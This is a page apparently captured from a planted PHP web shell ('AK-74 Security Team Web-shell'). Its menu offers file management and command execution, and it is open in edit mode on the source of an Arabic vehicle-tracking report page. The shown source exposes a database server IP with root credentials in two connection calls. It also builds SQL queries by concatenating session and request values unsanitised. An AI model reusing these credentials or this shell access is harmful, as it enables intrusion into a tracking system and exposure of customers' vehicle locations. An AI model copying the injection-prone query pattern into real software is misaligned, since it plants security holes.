.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<? session_start(); include ('../init.php'); include ('../func/fn_common.php'); loadLanguage($gsValues['LANGUAGE']); //setUserSessionSettings($_SESSION["user_id"]); //setUserSessionUnits(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta content="http://saudiex.com.sa ,gps tracking, تتبع المركبات, اجهزة تتبع, car trackers" name="robots"> <meta content="telephone=no" name="format-detection"> <meta content="http://saudiex.com.sa ,gps tracking, تتبع المركبات, اجهزة تتبع, car trackers" name="keywords"> <meta content="الشركه السعوديه التنفيذيه اعمال تتبع المركبات وافضل اجهزة تتبع مركبات اروبيه-أفضل شركة تتبع في العالم" name="description"> <meta content="http://saudiex.com.sa" name="msapplication-starturl"> <title>الخريطة الرقمية لتتبع المركبات</title> <!--<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>--> <link rel="stylesheet" type="text/css" href="style.css" /> <!--bootstrabpinline--> <link href="css/bootstrap.min.css" rel="stylesheet" media="screen"> <link href="css/datetimepicker.css" rel="stylesheet" media="screen"> <link href="css/bootstrap-editable.css" rel="stylesheet"> <link href="css/style.css" rel="stylesheet"> <script src="js/jquery-1.10.2.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/bootstrap-datetimepicker.js"></script> <script src="js/bootstrap-editable.min.js"></script> <script src="js/moment.min.js"></script> <script src="js/combodate.js"></script> </head> <body vlink="purple" link="blue" class="xl70"> <script type="text/javascript"> $(document).ready(function() { $.fn.editable.defaults.mode = "inline"; for (i = 0; i < 500; i++) { // $('#notice' + i).editable(); $('#notice' + i).editable({ source: [{ value: '', text: 'حالة السياره' }, { value: 'متوفره و بحاجه لصيانه', text: 'متوفره و بحاجه لصيانه' }, { value: 'في الورشة', text: 'في الورشة' }, { value: 'السيارة مؤجرة', text: 'السيارة مؤجرة' }, { value: 'السيارة متوقفه بالمكتب', text: 'السيارة متوقفه بالمكتب' }, { value: 'حادث', text: 'حادث' }, { value: 'الغاء اشتراك', text: 'الغاء اشتراك' }, { value: 'خساره كليه', text: 'خساره كليه' } , { value: 'مسروقه', text: 'مسروقه' } , { value: 'اخرى', text: 'اخرى' } ] }); $('#status' + i).editable({ source: [{ value: 'حالة الصيانه ', text: 'حالة الصيانه ' }, { value: 'بحاجه لتحريك ', text: 'بحاجه لتحريك' }, { value: 'بحاجه لصيانه ', text: 'بحاجه لصيانه ' } ] }); } }); </script> <?php /*session_start(); include ('../../init.php'); include ('../../func/fn_common.php'); checkUserSession(); loadLanguage($gsValues['LANGUAGE']); echo '<pre>'; print_r($_SESSION); echo '</pre>';*/ ?> <span class="xl72" style="text-align:right;border-top:none;border-left:none"> <?php if (!empty($row['lat']) || !empty($row['lng'])) getPlaceName($row['lat'], $row['lng']); ?> </span> <table cellspacing="0" cellpadding="0" border="1" style="border-collapse: collapse;table-layout:fixed;" id='dvData'> <tbody> <?php $_POST['user'] = $_SESSION['username']; $_POST['Date'] = date("Y-m-d"); $date = date("Y-m-d"); $newdate = strtotime('-4 day', strtotime($date)); $date = date('Y-m-d', $newdate); $selectt = "select gut.group_id,gu.username,gu.price,gu.price,gt.dt_tracker,gt.lat,gt.lng,gt.imei,gt.speed,gut.device,gut.sim_number,gut.`name` FROM gs_trackers as gt INNER JOIN gs_user_trackers as gut ON gt.imei=gut.imei INNER JOIN gs_users as gu ON gu.id=gut.user_id WHERE gu.username='" . $_POST['user'] . "' ORDER BY gt.dt_tracker DESC"; $select = "select gut.group_id,gu.username,gu.price,gu.price,gt.status,gt.notice,gt.dt_tracker,gt.lat,gt.lng,gt.imei,gt.speed,gt.device,gt.name,gt.sim_number FROM gs_objects as gt INNER JOIN gs_user_objects as gut ON gt.imei=gut.imei INNER JOIN gs_users as gu ON gu.id=gut.user_id WHERE gt.dt_tracker <='" . $date . "' AND gu.username='" . $_POST['user'] . "' ORDER BY gt.dt_tracker DESC"; $select2 = "select gut.group_id,gu.username,gu.price,gu.price,gt.dt_tracker,gt.lat,gt.lng,gt.imei,gt.speed,gt.device,gt.name,gt.sim_number FROM gs_objects as gt INNER JOIN gs_user_objects as gut ON gt.imei=gut.imei INNER JOIN gs_users as gu ON gu.id=gut.user_id WHERE gu.username='" . $_POST['user'] . "' ORDER BY gt.dt_tracker DESC"; set_time_limit(5000); $con = mysqli_connect("46.16.187.186", "root", "hgr,n[]h", "gs"); $result = mysqli_query($con, $select); $result2 = mysqli_query($con, $select2); $num_rows = mysqli_num_rows($result); $num_rows2 = mysqli_num_rows($result2); ?> <tr height="21" style="height:15.75pt"> <td width="156" height="21" style="height:15.75pt;width:117pt" class="xl65 xl72"><?php echo $_POST['user']; ?></td> <td width="181" style="border-left:none;width:136pt" class="xl66 xl72">Date:<font class="font11"><?php echo $_POST['Date']; ?></font></td> <td width="177" style="width:133pt" dir="RTL" class="xl67 xl72">العدد الكلي على الموقع=<font class="font11"><?php echo $num_rows2 ?></font></td> <td width="147" style="width:110pt" class="xl66 xl68 xl72">العدد =<font class="font11"><?php echo $num_rows ?></font></td> <td width="216" style="width:162pt" class="xl69"><input style="color:#FFF;background-color:#C00" type="button" onclick="tableToExcel('dvData', '<?php echo $_POST['user'] . '_' . $_POST['Date']; ?>')" value="Export to Excel"> </input> <?php if (!$_SESSION["cpanel_privileges"]) { ?> <input type="button" onclick="sendemail();" class="send" style="color:#FFF;background-color:#C00" value="حفظ وارسال"> <span style="color:#F00;" class="send"> الرجاء بعد الانتهاء الحفظ والارسال للمتابعه من قبل الخريطه الرقميه </span> <?php }?> <img src="loader.gif" width="170" height="36" style="display:none" class="loading"> <span style="color:#F00;font-size:14px;" class="done">شكراٌ لك .تم ارسال اخطار بالتعديلات للدعم الفنى وسوف نقوم بالمتابعه </span> </td> <td width="216" style="width:162pt" class="xl69"></td> <td width="330" class="xl70"></td> <td width="117" style="width:88pt" class="xl70"></td> <td width="112" style="width:84pt" class="xl70"></td> <td width="150" style="width:59pt" class="xl70"></td> <td width="150" style="width:91pt" class="xl70"></td> <td width="150" style="width:91pt" class="xl70"></td> </tr> <tr height="21" style="height:15.75pt"> <td height="21" style="height:15.75pt;" dir="RTL" class="xl71 xl72">تاريخ أخر تحديث</td> <!-- <td width="181" style="border-left:none;width:136pt" dir="RTL" class="xl71 xl72">رقم الجهاز</td> <td width="177" style="border-left:none;width:133pt" dir="RTL" class="xl71 xl72">نوع الجهاز</td> <td width="147" style="border-left:none;width:110pt" dir="RTL" class="xl71 xl72">رقم الشريحة</td>--> <td width="216" style="border-left:none;width:162pt" dir="RTL" class="xl71 xl72">اسم السيارة</td> <td width="216" style="border-left:none;width:162pt" dir="RTL" class="xl71 xl72">التصنيف</td> <td width="300" style="border-left:none;width:581pt"dir="RTL" class="xl71 xl72">موقع السيارة عند اخر حديث</td> <td width="300" style="border-left:none;width:581pt" dir="RTL" class="xl71 xl72">حالة الصيانة</td> <td width="300" style="border-left:none;width:581pt" dir="RTL" class="xl71 xl72">ملاحظات العميل</td> <!-- <td width="112" style="border-left:none;width:84pt" dir="RTL" class="xl71 xl72">تاريخ التقرير</td>--> <!-- <td width="150" style="border-left:none;width:91pt" dir="RTL" class="xl71 xl72">نوع الصيانة</td> <td width="150" style="border-left:none;width:62pt" dir="RTL" class="xl71 xl72">تاريخ الصيانة</td>--> </tr> <?php $i = 1; while ($row = mysqli_fetch_array($result)) { ?> <tr height="25" style="height:18.75pt"> <td height="25" style="height:18.75pt;border-top:none" class="xl72"><?php if ($row['dt_tracker'] == '0000-00-00 00:00:00') echo 'No Data'; else echo $row['dt_tracker']; ?></td> <!-- <td style="border-top:none;border-left:none" class="xl72"><?php echo $row['imei']; ?></td> <td style="border-top:none;border-left:none" class="xl72"><?php echo $row['device']; ?></td> <td style="border-top:none;border-left:none" class="xl72"><?php echo $row['sim_number']; ?></td>--> <td style="border-top:none;border-left:none" class="xl72"><?php echo $row['name']; ?></td> <td style="border-top:none;border-left:none" class="xl72"><?php echo getgroup($row['group_id']); ?></td> <td style="text-align:right;border-top:none;border-left:none" class="xl72"> </td> <?php if ($_SESSION["cpanel_privileges"]) { ?> <td style="border-top:none;border-left:none" class="xl72" data-type='select' data-url="post.php" data-title="حالة السياره" data-pk="<?php echo $row['imei']; ?>" id="status<?php echo $i; ?>"><?php echo $row['status']; ?></td> <?php } else{?> <td style="border-top:none;border-left:none" class="xl72"><?php echo $row['status'];?></td> <?php }?> <td style="border-top:none;border-left:none" class="xl72" data-type="select" data-url="post.php" data-title="ادخل الملاحظات" data-pk="<?php echo $row['imei']; ?>" id="notice<?php echo $i; ?>" ><?php echo $row['notice']; ?></td> <!-- <td style="border-top:none;border-left:none" class="xl72"><?php echo date("Y-m-d"); ?></td>--> <!-- <td width="150" style="border-top:none;border-left:none" class="xl72"> </td> <td width="150" style="border-top:none;border-left:none" class="xl72"> </td>--> </tr> <?php $i++; } ?> <?php function getgroup($id) { $query = "SELECT gs_user_object_groups.group_name FROM gs_user_object_groups WHERE gs_user_object_groups.group_id='" . $id . "'"; $con = mysqli_connect("46.16.187.186", "root", "hgr,n[]h", "gs"); $result = mysqli_query($con, $query); while ($ro = mysqli_fetch_array($result)) { return $ro[0]; } } ?> </tbody> </table> <br> <?php function getPlaceName($latitude, $longitude) { //This below statement is used to send the data to google maps api and get the place //name in different formats. we need to convert it as required. $geocode = file_get_contents('http://maps.googleapis.com/maps/api/geocode/json?latlng=' . $latitude . ',' . $longitude . '&sensor=false&language=ar'); $output = json_decode($geocode); //Here "formatted_address" is used to display the address in a user friendly format. if (!empty($output->results[0]->formatted_address)) // echo $output->results[0]->formatted_address; echo "<a href='http://maps.google.com/maps?q=$latitude,$longitude&t=m' target='_blank' style='text-decoration:none'>" . $output->results[0]->formatted_address . "</a>"; else { $geocode2 = file_get_contents('http://maps.googleapis.com/maps/api/geocode/json?latlng=' . $latitude . ',' . $longitude . '&sensor=false'); $output = json_decode($geocode2); if (!empty($output->results[0]->formatted_address)) echo "<a href='http://maps.google.com/maps?q=$latitude,$longitude&t=m' target='_blank' style='text-decoration:none'>" . $output->results[0]->formatted_address . "</a>"; else { echo "<a href='http://maps.google.com/maps?q=$latitude,$longitude&t=m' target='_blank' style='text-decoration:none'>$latitude °, $longitude°</a>"; } } } ?> </body> <script type="text/javascript"> var tableToExcel = (function() { var uri = 'data:application/vnd.ms-excel;base64,' , template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines/></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--></head><body><table>{table}</table></body></html>' , base64 = function(s) { return window.btoa(unescape(encodeURIComponent(s))) } , format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = {worksheet: name || 'Worksheet', table: table.innerHTML} window.location.href = uri + base64(format(template, ctx)) } })() </script> <script> function sendemail() { $.ajax({ url :'mail.php', type: 'post', beforeSend: function() { $('.send').hide(); $('.loading').show(); }, success:function(result) { if(result=='1'){ $('.send').remove(); $('.loading').remove(); $('.done').show(); } } }); } </script> </html>
Rename:
-